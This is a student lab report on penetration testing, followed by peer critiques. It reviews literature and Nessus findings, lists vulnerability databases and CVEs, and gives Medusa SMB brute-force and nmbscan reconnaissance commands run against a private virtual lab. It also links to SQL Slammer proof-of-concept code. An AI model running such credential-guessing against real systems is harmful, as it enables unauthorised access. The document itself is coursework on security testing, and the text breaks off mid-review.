Abstract
In this lab we will be researching exploits and testing to see if they actually work against our virtual systems. We will also discuss testing techniques that are designed t expose security issues. Another topic we will discuss is vulnerability testing and network penetration testing. Vulnerabilities can easy become the target of exploits. In this lab we will talk about how vulnerabilities can be used to retrieve information and gain access to machines. Also a knowledge of exploits and there target victims.
We will be dealing with tools that are in Backtrack 3 and some that are not precompiled in Backtrack 3. We will also attempt to exploit vulnerabilities that were reported by Nessus during lab 3. We will also be researching exploits by means of publications that on a daily basis provide information about current exploits.
Literature Review
Security vulnerabilities in new and existing software are the norm rather than exception. Working with the knowledge that we will always be forced to update our products on a regular basis is just “how it is.” Since software is created by people, and since people are not perfect, the constant discovery and patching of new security vulnerabilities isn’t going away any time soon. Security vulnerabilities present a real issue in terms of confidentiality, integrity, and availability of systems and services. Those vulnerabilities can become the subject of exploits, and be used for nefarious purposes to gain unauthorized access to resources on the systems being targeted. For this reason, red-teaming, and network penetration testing have become big business. The focus of the readings for this lab dealt with performing a structured penetration test though proper documentation for the benefit of the vendors writing new or updating existing software.
In the article network penetration testing by Liwen He and Nikolai Bode, they present a general overview of the process of penetration testing, as they see it, as well as two types of testing, vulnerability summary, and tools used. According to He and Bode, current IP networks are not sufficiently secure, hackers are able to exploit existing vulnerabilities in the network architecture and obtain unauthorized access to sensitive information and subsequently disrupt network services (He & Bode, 2005). This forms the basis of their article as well as the basis behind the other articles for this lab. The focus of their article seems to be on the tools generally used for penetration testing, and the future of the topic into at least semi-automated attacks. Since the focus of lab four was more on the exploits themselves rather than the tools used, the interesting part of the article, in my opinion, is the general process of penetration testing figure they present (He & Bode, 2005). This figure or flow chart seems to be a visual representation of what James R. Davison wrote about in his 2005 article on a Vendor System Vulnerability Testing Test Plan (Davidson, 2005). This article goes over a rather structured and complete approach to attacking a vendors SCADA system to gain a “secure” stamp of approval by Idaho National Laboratory. This article goes through each step as will be covered, and what will be attacked by researching the product submitted for evaluation. According to Davidson the test plan supports in depth vulnerability testing of the vendors SCADA/EMS, which also includes baseline scanning to validate the implementation of the vendors’ recommendations from the baseline report. The vulnerability testing will provide functional security testing through an in depth security analysis of the vendor’s system (Davidson, 2005). The article lists a very structured and complete documentation path for performing those tests, and is something that we should most likely look towards for our own red-teaming exercise at the end of the semester. Davidson states that they will be performing a baseline analysis, or recon, prior to performing the tests, and could probably make use of the some of the tools that He & Bode present such as WS_PringProPack, or Netcat (He & Bode, 2005).
Once the baseline scan that Davidson discusses using the tools from He & Bode is complete, Davidson’s team could look at the findings of the Herbert H. Thompson and Scott G. Chase in Red-Team Application Security Testing in 2003. In their article they explain application security testing is NOT part of the other functional testing that goes into usual software development and needs to be performed by people other than typical software testers (Thompson & Chase, 2003). Where Davidson could make use of the Thompson and Chase article is in their methodology to application security testing. The process that is used by Thompson and Chase involves the planners creating requirements for tools used in the testing, and test plans, determining if the tools exist or need to be developed, assigning a value to each feature that needs to be tested, running the test and creating a report (Thompson & Chase, 2003). While most of this is covered by Davidson, the parts that are truly lacking from his article are the decision to find or develop a new tool, and a good scoring system to assign to each feature to test in terms of importance.
The Thompson & Chase article does seem to present the most relevance to lab four. Assigning a score to each feature of a system that recon has been performed on is going to show which features are the most important and possibly the quickest way to gain access. Where we found this article lacking for the lab and in general were in the lack of any solid references. But I did find it useful to know that while HASP is a good way to prevent software piracy, the final section on protecting software based revenue was to NOT use a HASP device. Interesting that they would put an ad for this device in an article that said do not use it (Thompson & Chase, 2003). Building on the scoring system of the first article, Davidson showed that a well structured approach to performing penetration testing and red teaming is something that we should not over look in this course. By having these plans and documents laid out after performing initial recon of a target system, the team that is performing that actual test can be made much more efficient and work through the problem at a much faster pace than without. That was what we saw as being the tie in to lab four for this particular article. The only real issue I saw with the article was on how they chose no list possible expansion into non-SCADA systems (Davidson, 2005). With the concepts of the first two articles in mind, the third, by He & Bode, lists a number of tools that are very effective in capturing the recon data needed to complete the documentation in Davidson as well as the tools to perform the actual penetration while keeping an eye to the future of penetration testing. The Figure presented by He & Bode also shows a well thought out visual plan we could follow for those who can’t just read and understand (He & Bode, 2005).
Methods
There were three areas of focus in this lab a literature review, research into working exploits uncovered by Nessus in lab three, and research into vulnerability and exploit databases available on the Internet. The focus of the literature review for lab four was on penetration testing, and red teaming. By combing the focus of the literature with the objectives of the lab we hoped to garner a better understanding of those objectives and provide complete results.
The Nessus scan in lab 3 reported that target machine having five open ports and seventeen low vulnerabilities. Zero, vulnerabilities were discovered as being, classified as Medium or High according to Nessus. The five ports are Port 137-UDP netbios-ns, Port 445-TCP Microsoft-ds, Port 135-TCP epmap, Port 123-UDP NTP, and Port 139-TCP netbios-ssn.
Port 137-UDP NETBIOS-NS
This port handles NetBios Naming service. NMBScan may be able to exploit the machine by scanning for shares.
Port 445-TCP Microsoft-ds
This port hands traffic for Microsoft Active Directory and Windows Shares. Medusa Parallel Network Login Auditor may be able to exploit the machine through this port.
Port 135-TCP epmap
This port handles location services, DHCP, DNS and WINS. EPMAP stands for End Point Mapper.
Port 123-UDP NTP
This port is used for time synchronization. NTP stands for Network Time Protocal thus being the time synchronization port.
Port 139-TCP netbios-ssn
This port handles the NetBios session service. Medusa has a SMBNT module which tests against the Netbios-ssn on port 139.
Medusa was used for exploiting ports 139. Medusa was used in Backtrack with the command medusa -h 192.168.2.1 -U host.txt -e ns -M smbnt -m NETBIOS -n 139 as shown in figure 1-1. A text file was created with popular user names such as root, admin and administrator. Using the smbnt module will first use port 445 then 139 however the command above uses port 139 exclusively. “The SMBNT module tests accounts against the Microsoft netbios-ssn (TCP/139) and microsoft-ds (TCP/445) services (Medusa Parallel Network Login Auditor :: SMBNT, 2009)” To use port 445 use the command medusa -h 192.168.2.1 -U host.txt -e ns -M smbnt as shown in figure 1-2.
Nmbscan was used in backtrack and with the command nmbscan -a will show all domains, master browers, and servers. An example of the scan on our virtual subnet is shown in figure 1-3. The scan looks for SMB and Netbios shares. Nmbscan scans the subnet for live hosts and reports back information using Netbios. If only desiring all domains then -d will return the domains. This software can also obtain NMB, SMB, NetBios, Windows hostnames, as well as detailed information about the hostname. Information such as IP address, IP hostname, Mac address, and more.
In the third part of the lab we were given the tasks of researching exploit code and exploit repositories, researching the level of expertise required in exploit code, and auditing a sample of current exploits in relation to the lab one taxonomy for any interesting conclusions that could be drawn. With the use of BugTraq as a vulnerability database source out of the question as per the lab design document, we set out in search of “security vulnerability databases” and “exploit code” through Google. These results formed our source material into the two search terms. With a better understanding of these two topics, we dove into discovering what level of expertise was involved in exploit code. Again we returned to Google. However this time we used the term “SQL slammer exploit code.” This term was used to find the specific proof of concept example code that made the slammer worm possible, that code can be found here: “http://downloads.securityfocus.com/vulnerabilities/exploits/sql2.cpp”. Finally, we took a closer look into the chosen security vulnerability repositories. The goal being to compare specific vulnerabilities to the taxonomy created in lab one to better understand the relation of attack tools and OSI layer to the sampling of vulnerabilities.
Findings
The virtual machines are teamed together using a virtual LAN segment. Several of the tools, exploits are web based, services running, and these machines do not have access to the outside world, and IPs are static. They do not require a server to provide them with a service such as DHCP, DNS or WINS. Medusa was very helpful with retracting information such as actual user names and passwords for the target machine. The downside in using medusa is the attack has to have a text file with usernames and passwords for medusa to use. These text file are easily generated and these text files are available for download if Google searched. Other Modules are available for use with Medusa for, FTP, IMAP, POP3, SSHv2, Telnet and more. This information is available at: http://www.foofus.net/~jmk/medusa/medusa.html. Medusa can easily provide username and password, with already put together files, without any notification to the host user. Nothing appears and informs the users that there was too many failed login attempts at local host. After reviewing information about Medusa, there was the ability to use information gather from PwDump to gain entrance to the machine.
We begin by defining what vulnerability and an exploit are. According to Webster’s vulnerability is the state of being open to an attack. (Merriam-Webster). Also according to Webster’s an exploit is furtherance or outcome (Merriam-Webster). With that in mind we postulate that in information security a vulnerability exploit is the furtherance or outcome of being open to attack. This definition can be applied to the lab as an exploit being the attack itself while a vulnerability being an attackable vector. CVE defines vulnerability as a mistake in software that can be directly used by a hacker to gain access to a system or network (The MITRE Corporation, 2009). It is with this in mind that we continue.
Exploit code can also be referred to as proof of concept code to demonstrate an exploit. It is software code that is written with the intent of exploiting vulnerability, or submitted as proof that vulnerability exists. Often times it is the later that creates the former. When proof of concept code is created, and ultimately publically uploaded to sites such as bugtraq, taking that code and using it for nefarious purposes is nothing more than matter of ethics. Anyone with knowledge of bugtraq could download exploit code, and use it in the wild to attack the unsuspecting or ignorant. Such was the case with the SQL slammer worm. Code written to prove a point was turned into one of the most wide spread network attacks of all time. The only requirements for the perpetrator of this attack were knowledge of bugtraq, and the ability to copy and paste text. Often times the exploit code uploaded for public consumption is nothing more than a batch or shell script or simple C based code. This makes the level of expertise required in finding and using exploit code low.
Security vulnerability databases like bugtraq are digital warehouses of information for current and past vulnerabilities as they are discovered. Bugtraq is well known in the vulnerability database category. It is not the only free and open source of information on security bugs, exploits, holes, and vulnerabilities in the software most of use every day. We found four free sites that also perform the function of vulnerability database. These sites are the Common Vulnerabilities and Exposures or CVE, the National Vulnerability Database or NVD, the US-CERT Vulnerability Notes Database, and the Open Source Vulnerability Database or OSVDB. CVE considers themselves to be a dictionary of publicly known information security vulnerabilities and exposures (The MITRE Corporation, 2009). CVE differentiates themselves by providing the CVE identifier to an entry in their database and links to the actual source of the information requested (The MITRE Corporation, 2009). The NVD is the U.S. government repository of standards based vulnerability management data. This data enables automation of vulnerability management, security measurement, and compliance. NVD includes databases of security checklists, security related software flaws, misconfigurations, product names, and impact metrics (NIST). The US-CERT Vulnerability Notes database is a database of all vulnerabilities that US-CERT is aware of, but are not severe enough in the opinion of US-CERT to warrant a technical alert (US-CERT, 2009). Vulnerability notes include technical descriptions of the vulnerability, as well as the impact, solutions and workarounds, and lists of affected vendors (US-CERT, 2009). The OSVDB is an independent and open source database created by and for the security community. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities. The project will promote greater, more open collaboration between companies and individuals, eliminate redundant works, and reduce expenses inherent with the development and maintenance of in-house vulnerability databases (Open Source Vulnerability Database, 2008).
Based on the four security vulnerability databases described above, we chose CVE as the source of our in depth analysis of how exploits align with the penetration testing taxonomy in lab one. 21 CVE identifiers were chosen, three per OSI layer, to see if any conclusions could be drawn. The CVE identifier is aligned in the taxonomy in table 1 in the tables section. The chosen vulnerabilities are focused more towards Macintosh and Cisco vulnerabilities. Because Windows and Linux vulnerabilities are so prevalent and east to find, we chose show that both Apple and Cisco are not perfect. In this table we show that the IOS, the OS that could be considered to run the Internet, is not exempt from network attack.
Issues
There were some tools that were not complied in Backtrack, such as NMBScan but mentions that the software is available under Information Gathering. Simply downloaded the RMP and installed using rpm -I and done.
Conclusions
Lab four presented many useful insights for penetration testing. While searching for exploits and tools several of the tools would not work in the current environment mainly because there were several key components missing. There was not DHCP server, DNS server, nothing that has been done to leave an opening. These machines are barely used and ports, services are off or not running.
Based on table 1, there are three conclusions that we drew. The first conclusion we drew was that finding vulnerabilities for each layer of the OSI model was not difficult, as three are listed for each layer. The second conclusion we drew was that most of the listed exploits deal with Denial of Service style vulnerabilities over the other types as there are 10 DoS vulnerabilities and the next closest is arbitrary code execution at 5. The third conclusion we drew was that every operating system and piece of software in existence is susceptible to vulnerability and attack.
Tables & Figures
Table 1:
OSI layer |
CVE ID |
Exploit |
Product |
McCumber Coordinate |
7 |
CVE-2009-1859 |
Arbitrary Code Execution |
Adobe Reader 7 – 9 |
Integrity Transmission Technology |
7 |
CVE-2009-0944 |
Denial of Service |
Spotlight in OS 10.4.11 – 10.5.6 Microsoft Office for Mac import |
Availability Processing Technology |
7 |
CVE-2009-0552 |
Arbitrary Code Execution |
Internet Explorer 5 & 6 Windows XP, 2003, Vista, 2008 |
Integrity Transmission Technology |
6 |
CVE-2009-1157 |
Denial of Service |
TLS for Voice Proxy Cisco ASA & PIX 7.0 – 8.1 |
Availability Processing Technology |
6 |
CVE-2009-0152 |
Privileged information disclosure |
SSL connections to AIM disabled iChat in OS 10.5 before 10.5.7 |
Confidentiality Transmission Technology |
6 |
CVE-2009-0161 |
Spoofed Certificate ID |
OpenSSL module for Ruby Mac OS 10.4.11 – 10.5.6 |
Confidentiality Transmission Technology |
5 |
CVE-2009-0846 |
Denial of Service Arbitrary Code Execution |
krb5 before 1.6.4 |
Availability Processing Technology |
5 |
CVE-2009-0079 |
Elevated privileges |
Windows RPC SS Windows XP & 2003 |
Confidentiality Processing Technology |
5 |
CVE-2007-5225 |
Privileged information disclosure |
Named Pipes Solaris 8 – 10 |
Confidentiality Processing Technology |
4 |
CVE-2009-0077 |
Denial of Service |
Microsoft ISA Server 2004 & 2006 TCP Session State |
Availability Processing Technology |
4 |
CVE-2009-0159 |
Arbitrary Code Execution |
NTP before 4.2.4p7-RC2 |
Integrity Transmission Technology |
4 |
CVE-2008-1150 |
Denial of Service |
VPDN PPTP Adapter Cisco IOS before 12.3 |
Availability Processing Technology |
3 |
CVE-2009-1155 |
Bypass Authentication |
AAA override-account-disable IPSEC VPN Cisco PIX & ASA |
Confidentiality Transmission Technology |
3 |
CVE-2007-0069 |
Arbitrary Code Execution |
Crafted IGMPv3 packets Windows XP, Server 2003, Vista |
Integrity Transmission Technology |
3 |
CVE-2008-3809 |
Denial of Service |
malformed Protocol Independent Multicast packet IOS 12.0 – 12.4 Cisco 12000GSR |
Availability Processing Technology |
2 |
CVE-2006-4292 |
Denial of Service |
Niels Provos Honeyd before 1.5b crafted ARP packet |
Availability Processing Technology |
2 |
CVE-2005-1942 |
Bypass Authentication |
Cisco Switches with 802.1x port security crafted CDP packet causes anonymous access |
Confidentiality Transmission Technology |
2 |
CVE-2009-0058 |
Denial of Service |
Vulnerability scanner traffic causes Cisco WLC modules Cat. 6500, 3750 DOS |
Availability Processing Technology |
1 |
CVE-2000-0451 |
Denial of Service |
Intel express 8100 ISDN Router Large ICMP packets |
Availability Processing Technology |
1 |
CVE-2008-6497 |
Denial of Service |
Neostrada Livebox ADSL Router multiple HTTP requests for the /- URI. |
Availability Processing Technology |
1 |
CVE-2008-1453 |
Arbitrary Code Execution |
Bluetooth stack in Windows XP & Vista via large series of SDP packets |
Integrity Transmission Technology |
Figures:
Figure 1-1 Medusa scanning on port 139
Figure 1-3 Medusa scanning on port 445 by default
Figure 1-3 Nmbscan scanning for hosts using Netbios, SMB, and others
Works Cited
Davidson, J. R. (2005). Vendor System Vulnerability Testing Test Plan. Idaho Falls: Idaho National Engineering and Environnmental Laboratory.
He, L., & Bode, N. (2005). Network Penetration Testing. The First European Conference on Computer Network Defence (pp. 3-12). Wales: University of Glamorgan.
Medusa Parallel Network Login Auditor :: SMBNT, 2009 Retrieved July 5, 2009, from
http://www.foofus.net/~jmk/medusa/medusa-smbnt.html
Merriam-Webster. (n.d.). exploit – Definition from the Merriam-Webster Online Dictonary. Retrieved July 5, 2009, from Meriiam-Webster Online Dictonary: http://www.merriam-webester.com/dictionary/exploit
Merriam-Webster. (n.d.). vulnerability – Definition from the Merriam-Webster Online Dictonary. Retrieved July 5, 2009, from Merriam-Webster Online Dictonary: http://www.merriam-webster.com/dictionary/vulnerability
NIST. (n.d.). National Vulnerability Database Home. Retrieved July 5, 2009, from National Vulnerability Database: http://nvd.nist.gov
Open Source Vulnerability Database. (2008). Open Source Vulnerability Database. Retrieved July 5, 2009, from Open Source Vulnerability Database: http://osvdb.org/about
The MITRE Corporation. (2009). CVE – Common Vulnerabilities and Exposures (CVE). Retrieved July 5, 2009, from Common Vulnerabilities and Exposures: http://cve.mitre.org
Thompson, H. R., & Chase, S. G. (2003, November 1). Red-Team Application Security Testing. Dr. Dobb’s Journal , pp. 18-27.
US-CERT. (2009). US-CERT Vulnerabilty Notes Database. Retrieved July 5, 2009, from US-CERT: http://www.kb.cert.org/vuls
Team 2 begins with an abstract describing the lab requirements. In the sentence “Also a knowledge of exploits and there target victims” I believe the correct word to use would be “their” instead of “there”. There were a few other spelling and grammatical errors, but I am using this as an example. They proceed to state that they will be using tools contained in Backtrack3 and others that are not precompiled in backtrack 3. And state that they will be attempting to exploit vulnerabilities that had been reported by Nessus. They will also research publications of current exploits.
They begin their literature review with a discussion of application vulnerabilities and then discuss the common theme of the literature reviews, “performing a structured penetration test through proper documentation for the benefit of the vendors writing new or updating existing software”. The first article they discuss is Network Penetration Testing (He, Bode, 2005). They compare this article to Vendor System Vulnerability Testing Test Plan (Davidson, 2005) and discuss how both cover the steps in the process of penetration testing. I agree with that assessment. Although these articles were very informative, I found the areas of process and documentation are applicable for our current lab. Network Penetration Testing (He, Bode, 2005) also lists a large number of tools and vulnerabilities that will be helpful in this and future labs. They proceed to review Red-Team Application Security Testing (Thompson and Chase, 2003). Although I feel that one of the major points of the article was the functional decomposition of applications to test each module separately, this review did not mention it at all. They seem to equate application testing to system testing and use that to find relevance to our current laboratory assignment. I believe that it can be summed up in a sentence from the introduction paragraph of the article, “In this article, we describe a methodology for finding the underlying causes of these vulnerabilities—bugs in software” (Thompson and Chase, 2003, p18). Since part of our laboratory assignment was to find stand-alone exploitation tools, compare them against the OSI model and look for patterns, this statement is a hint that we may find most of them in the application layer.
In the methods section they discuss the results of the Nessus scan from the lab 3, and the vulnerabilities that each open port represents. They go into an in-depth discussion of what each open port does. They proceed to describe vulnerabilities that apply to each open port and discuss Medusa, which exploits services on port 139. They also discuss using Nmbscan, which will “show all domains, master browers, and servers”. The Nmbscan is more of a reconnaissance than an exploit tool. They did not document any other exploits. They list two web sites containing vulnerability data in this section, BugTraq and Securityfocus. They list four additional security and vulnerability databases in their findings section.
The descriptions of the various open ports and their associated services were very good. They also included a good discussion of the various vulnerability databases. They seem to conclude that the vulnerabilities listed in the databases are evenly distributed throughout the OSI model, whereas our own conclusions were that more than 90% fall in the application layer. Also, they only found and tested one stand-alone penetration tool to be used against the exploits that were identified in their Nessus scan. Their document could also use some proofreading to eliminate some of the minor errors.
Group 2 starts off with a decent abstract. The group talks about what is going to be done in each part of the lab. One thing that was missing from the abstract is some type of tie into the rest of the labs in this course. The group could have given a description on how this lab could relate to the other labs and what the overall goal of this lab was trying to accomplish. The group did a nice job opening the literature reviews. The group explained how vulnerabilities will always be part of the process of developing software because of human error and that these vulnerabilities can lead to people developing exploits to take advantage of these vulnerabilities. The group then relates the articles given in this lab to this previous statement by explaining that the articles are about “performing structured penetration tests through documentation.” The rest of the literature review was done very well. The group takes each article and describes what the article is about and where in the current lab this article fits. They also show how each article fits together in relation to this lab. The group also explains what each of the articles lack and how they could have been improved on. The group covered the literature review very thoroughly except I didn’t see anything that related to the research question of each of the articles. The beginning of the methodology section gave a brief overview of the whole lab and explained how the literature review tied into this lab. In the next section of the methodology the group gives their findings in a scan done by Nessus in lab 3. They then give a description of each of the ports that were open. I do not understand why this is in the methodology section; I believe that it should be in the results section of this lab report. I did not find any were in the methodology a description of how they came up with the table of the exploits they gave at the end of the report. There should have been a mention of how they created the table in the methodology. The group did a nice detailed job on explaining the process of testing tools, but did not explain what the purpose of these tests were. The last part of the methodology described the last part of the lab. The group covered almost all of this section of the lab and how they were going to go about accomplishing each part. The only part that was not mentioned was the explanation of the evaluation of the level of expertise involved. The first part of the findings describes what was discovered in the first part of the lab. This part seemed to lack a lot of the information that was needed to cover the questions given in the lab. The group failed to cover any discussion of the table that was created to show the relationship of the exploits in Nessus or Nmap and the OSI model and McCumber’s cube. The group does not even mention Nessus or Nmap. They cover a couple of other programs, like medusa and PwDump. The questions in the lab ask about the exploits used in Nessus or Nmap and those were not covered. The group did a nice job in explaining how they tested medusa and the results they got from running it, but nothing more than that. The next part of the methodology gives a good definition of what a vulnerability is. This part seemed out of place though. It seemed it should have gone at the beginning of the results or even in the abstract. The rest of the findings were about the last part of the lab. The group discusses the different sites that they found and did a nice job of describing the level of expertise of that site. They gave very good descriptions of each of the sites. Examining the findings in this group’s lab, it seemed that the group spent a lot of time with the last part of the lab and did not cover hardly any of the first part. In the issues the group talks about how one piece of software was not installed in Backtrack. I think this should have been included in the methodology section of the report explaining how they installed it and ran it. In the conclusion the group explains that they had trouble running a lot of the exploits due to not having the right services to use the exploits against and the lack of use of the computers in the network. This part should have not been in the conclusion, but it should have been brought up in the issues. The second part of the conclusion focuses on the table created in the first part of the lab. I do not understand why this was not given in the results section of the lab. The conclusion lacked any closing on the lab. I did not see anything that talked about the overall experience of the lab and what was learned.
The abstract is a good summary but contains a few spelling and word choice errors. The literature review is an excellent treatment of the topic, subject matter, and the assigned literature. The discussion on the papers seems to talk more about how the articles discuss penetration testing than how they will relate to the topic of the current laboratory exercises. Penetration testing is important but the discussion in the papers about how that relates to finding exploits, researching them, and ultimately fixing them is the real focus of these exercises. I had a hard time following the point of the third paragraph of the literature review about application development and testing. You mention the Thompson/Chase paper saying that security testing isn’t a part of the development process. Should it be? Surely in this security class we should make the determination on whether or not we agree with this statement. The discussion on the ads that appeared in the Thompson paper was interesting. While the ad is mentioned as conflicting with the opinion of the paper, the authors don’t give their opinion on this conflict. One thing to watch in future literature reviews is the “person” that is being used. It switches between singular and plural and makes it hard to read from the perspective that this was written by a group.
The methodologies seem to be almost entirely skipped over and the report moves straight into the discussion of the results before we even know what is being run and what it’s being run against. What machine is Medusa being run against? Assumedly this would be a Windows machine based on the protocol that Medusa works with. How is the nmbscan tool an exploit tool? Would that be more of a reconnaissance tool if it discovers SMB servers on a network? The methodologies for the “third part” make no mention of the findings from the previous section and how they would tie in to this process.
The findings section is equally as confusing as the methodologies. The findings for running the Medusa tool are given followed by a definition of “vulnerability” and “exploit.” These would’ve been better in the literature review rather than the findings section. There is no mention of how the 21 CVE vulnerabilities are selected and the decision to use Apple and Cisco vulnerabilities doesn’t fit with the lab environment. Were these tested at all on other equipment then?
The sentence in the “issues” section “Simply downloaded the [sic] RMP and installed using rpm -I and done” is really informal and grammatically incorrect.
The conclusions section misses a lot of key points that should have been concluded from the lab data. Simply missing a DHCP and DNS server in our test environment doesn’t mean that the test machines can’t be exploited.
Among the commendable attributes of team two’s lab write-up, I found the discussion of the concepts of ‘vulnerability’ and ‘exploits’ in the ‘Findings’ section to be nicely worded. Additionally, I found the literature review refreshing in that it was not merely a summary, but a serious attempt to analyze the concepts in the articles, and how they related to the lab exercise. The ‘Methods’ section was extensive, although some of the material appeared out of place. The screen shots were a nice visual addition, and the vulnerability listing table nicely formatted.
Some substantial deficiencies can be found in this team’s report, however. Foremost, the literature review, while admirable in conceptual aim, had significant issues with grammatical subject identifiers. The author(s) slipped between the first person singular and plural at seemingly random intervals. This was distracting, and likely out of place in a document purported to be of an academic nature. Certainly, a consistent use of grammatical rules would greatly improve this section.
Additionally, I thought that the ‘Methods’ section to have material from what properly could be considered ‘Findings.’ As using ‘Nessus’ to automate vulnerability detection on the target host was indeed a part of the methodology; it only seems logical that the results of this scan should be displayed in the ‘Findings’ section. This is a relatively minor detail, but one which should be an obvious target for improvement in future lab write-ups.
In regard to the first part of the experiment in the use of ‘Medusa,’ I must ask: did you really obtain any results? I see screenshots of the tools running, and saw a description of the tool’s capabilities, but observed no indication that a real ‘exploit’ was achieved. Granted, this is a contrived situation, as the share passwords were surely already known to the testers; but could a more realistic experiment, using a share password unknown to the ‘attacking’ part of the team have been implemented? As it appears in the current report, nothing was really accomplished beyond running ‘Medusa’ against the target machine and sidestepping around the issue of significant results. Was anything learned beyond what was already apparent from the reconnaissance scan; or furthermore, what exactly was ‘exploited?’
Finally, perhaps the most significant criticism lies in the ‘self selection’ nature of the vulnerability database content analysis. I believe the aim of the laboratory exercise was to determine, if possible, if any pattern appeared in the database listings ‘in entirety’ with respect to the OSI model. Choosing an equal number of samples for each layer, or category, of the OSI model and then drawing general conclusions from these samples is a most grievous error in using statistical analysis. I would submit that this team did not answer the question of ‘general patterns’ with respect to the OSI layer; furthermore, the assertions made that ‘most of the listings are DOS exploits’ cannot be taken seriously. This assertion may be true of ‘your’ self-selected data: but it certainly cannot be applied to anything other than this. I believe these lab exercises leave much of the implementation choices up to the individual teams; but I see no real purpose or usefulness in the approach adopted by this team in the vulnerability database analysis portion of this lab, it is simply a ‘nice’ orderly list which proves nothing.
One of the first items that was noticed about this lab report, is the continuous use of the words “We” and “I”. The team should not be using the word I at all in their team lab report. Another item was the writing of the lab report. “Also a knowledge of exploits and there target victims” is not a complete sentence, besides the continuous misuse of “there” and “their”. There was a lot of inconsistent verb tenses throughout the entire lab report. While the abstract did state exactly what the team was going to do during the lab experiment, it read just like the objectives of the lab that were given to all the teams. The only exception is that the group does point on that they will be using Nessus and not NMAP. This lab report had one of this team’s best beginning paragraphs; they did not just dive right into the literature review, but first gave a brief synopsis of the main idea of all the articles. The citations for the literature review are still not in the proper APA 5 format. I am not too clear on what the following means “This forms the basis of their article as well as the basis behind the other articles for this lab”. I do not think that all of the articles deal with the fact that IP networks are not sufficiently secure, but rather only the He & Bode article. It is true that the other articles believe that the standard equipment and software is not secure enough, but the other articles are not only about IP networks.
In the second paragraph of the literature review, the team puts an opinion and then puts a citation after it. Is the opinion in the article? The group states “This figure or flow chart…”, but they never put the figure number from the article, or even a picture of the flow chart. I found it interesting that the group talks about how some of the authors of the articles could use the other required readings for this lab as a baseline to their methodology. I wish the group would have gone into more detail on why the authors should have read each other’s articles before beginning their work. Even though this literature review was somewhat cohesive, it still seemed like a list. I had a hard time getting past some of the grammatical errors, for example “The only real issue I saw with the article was on how they chose no list possible expansion into non-SCADA systems (Davidson, 2005)”. Please proof read your paragraphs before submission. The group has a decent method section, but when listing all of the ports it lost its ease of reading. All of the separated information could have been combined into one paragraph. I do not think that the group clearly finished part 2 of this lab. The level of expertise is only talked about for one of the sources for exploits. All need to be talked about. While they group did put exploits into the proper grid, they did not talk about any conclusions made from this, nor did they have a sample to prove their case. While part 1 was just about all there, most of part 2 was not. And please once again, proof read your lab report before submission.
The abstract is a good summary of what team 2 intends to do. Spell check and grammar check should be used before submitting your paper. The literature review contains your discussion of sources and is organized by publication. The literature review is a good summary of what the authors are trying to convey to us; however I do not believe team 2 does an adequate job of tying the articles back to how they relate to the lab exercise.
The methods section is very short and seems to blend in with their results section. This made the paper hard to follow. Part 2 seems to be lost in the findings section. Again as with some of the other teams they take the route of explaining what the vulnerability data bases do as opposed to the level of expertise needed to run the tools on the listed sites. I don’t think we needed a definition from Merriam-Webster as to what vulnerability and exploit are. Rather than extensively describing to us what the vulnerability sites were used for, research into what levels of expertise were needed to run the exploits on these sites should have been provided
Their conclusions were good and I agree with their thoughts on the third conclusion, however that conclusion should be a given considering the number of courses taken with Professor Liles.
Team two gave a detailed overview of the laboratory exercise within their abstract section.
In the literature review section, I was not sure what article team two was referring to when they stated “This figure or flow chart seems to be a visual representation of what James R. Davison wrote about in his 2005 article on a Vendor System Vulnerability Testing Test Plan”. I agreed with team’s two analysis of the article, Vendor System Vulnerability Testing Test Plan in that as team two stated “The article lists a very structured and complete documentation path for performing those tests, and is something that we should most likely look towards for our own red-teaming exercise at the end of the semester” I had noticed that other teams interpreted the article as being somewhat unscholarly. Team two described the article’s omission as “the parts that are truly lacking from his article are the decision to find or develop a new tool, and a good scoring system to assign to each feature to test in terms of importance.” However, I must disagree because the development of a new tool was out of the scope of the paper, for existing tools were to be used.
In the methods section, when team two stated “The Nessus scan in lab 3 reported that target machine having five open ports and seventeen low vulnerabilities: they did not specify what virtual machine was being targeted. Since they listed the open ports as Port 137-UDP netbios-ns, Port 445-TCP Microsoft-ds, Port 135-TCP epmap, Port 123-UDP NTP, and Port 139-TCP netbios-ssn, it was some type of Windows machine, but they did not specify if it was Windows Server 2003, Windows Service pack 0 or Windows Service pack 3.
Some of the tools that were used to find similar exploits included Medusa and Nmbscan.
In the findings section team 2 listed the online sources they found for indentifying exploits, which included the Common Vulnerabilities and Exposures or CVE, the National Vulnerability Database or NVD, the US-CERT Vulnerability Notes Database, and the Open Source Vulnerability Database or OSVDB. Team two did not describe the expertise involved with the different sites.Team two did not place the exploits that were discovered on the Internet into the lab1 styled table/grid.
In the issues section team two stated” There were some tools that were not complied in Backtrack, such as NMBScan but mentions that the software is available under Information Gathering”. My team has also come across problems installing some tools onto Linux environments. I do not know why they cannot install easily like web browsers such as Mozilla Firefox or sea monkey or Windows applications. That is one reason why UNIX or Linux will not be replacing Windows anytime soon in the main stream.
In the conclusion section, I had to disagree with the statement “The first conclusion we drew was that finding vulnerabilities for each layer of the OSI model was not difficult, as three are listed for each layer.” Most of vulnerabilities were found in the Application layer of the OSI model.
I think that group 2’s write-up for lab 4 was very good. The abstract for this lab was good and accurately described the laboratory. The literary review was good and adequately reviews the material. Group 2 answered all of the required questions for each reading. All of the citing for the literary review was done correctly. For part 1, the group answered all of the required questions and looked at and tested many different stand-alone tools to back up their claims. Part 2 answered all of the required questions as well, however, the group did not find exploit databases but rather vulnerability databases. Even still, the group actually discussed exploit code and how it differs from a vulnerability. The group also included a very extensive table that indicates many vulnerabilities and how they relate to the McCumber Cube. Finally, the conclusion was written well and accurately sums up the laboratory.
Team 2 starts off with their abstract and defining what that is going to be accomplished within the lab and what tools that they will be using. They chose to use Nessus and Backtrack 3. They chose these tools based on what they had learned in the previous lab. They then go onto their literature review and in the first paragraph discusses security vulnerabilities and how they present issues to systems and services. Then they discuss the ranking system within the different articles. This gave the question what does the team think would be a good system to rank vulnerabilities? Would it be usefully to include the McCumber cube coordinates and OSI seven layer model locations? They then go on to the methodologies and describe what they are going to be working with in this section. They where smart in using the same exploits found in the last lab and using them for this lab and using this information for the additional tools. But was Nessus up to date to find vulnerabilities within the system? Also was any other test run against the operating systems within their virtual environment? They then go onto describe the databases that they had found and about each of them. With all the different databases that are available does the group believe that there should be a standard database? Or is it good that there are numerous databases some paid and some not? Also the group explains that some of the tools do not work the same because of being in a controlled environment? Would the teams get different results if these networks where connected to the internet? They the go on and discuss the issues that they had with backtrack and the limitations they had when they tried to use some of the tools. At the end they conclude their lab with what they had found for the various layers of the table. When looking at the vulnerabilities for the applications and operating systems, what is the 